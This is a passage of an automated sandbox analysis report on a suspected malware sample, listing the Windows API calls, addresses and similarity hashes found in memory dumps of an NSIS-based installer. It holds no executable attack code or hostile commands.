                                                                                                                • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • wsprintfW.USER32 ref: 004067A4
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                • wsprintfW.USER32 ref: 00402E45
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402981
                                                                                                                  • Part of subcall function 0040345D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                  • Part of subcall function 004031D6: SetFilePointer.KERNEL32(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 488507980-0
                                                                                                                • Opcode ID: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
                                                                                                                • Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
                                                                                                                • Opcode Fuzzy Hash: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
                                                                                                                • Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • wsprintfW.USER32 ref: 00404CB6
                                                                                                                • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s$(7B
                                                                                                                • API String ID: 3540041739-1320723960
                                                                                                                • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                                • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                                • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: *?|<>/":
                                                                                                                • API String ID: 589700163-165019052
                                                                                                                • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1941528284-0
                                                                                                                • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 3808545654-0
                                                                                                                • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                APIs
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$Enum
                                                                                                                • String ID:
                                                                                                                • API String ID: 464197530-0
                                                                                                                • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                • GetLastError.KERNEL32 ref: 00405976
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                • GetLastError.KERNEL32 ref: 00405995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 3449924974-0
                                                                                                                • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405D76
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405E1E
                                                                                                                • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00405E2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID: 0_B
                                                                                                                • API String ID: 3248276644-2128305573
                                                                                                                • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                  • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004036EF), ref: 00405F46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: nsa
                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 004059E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
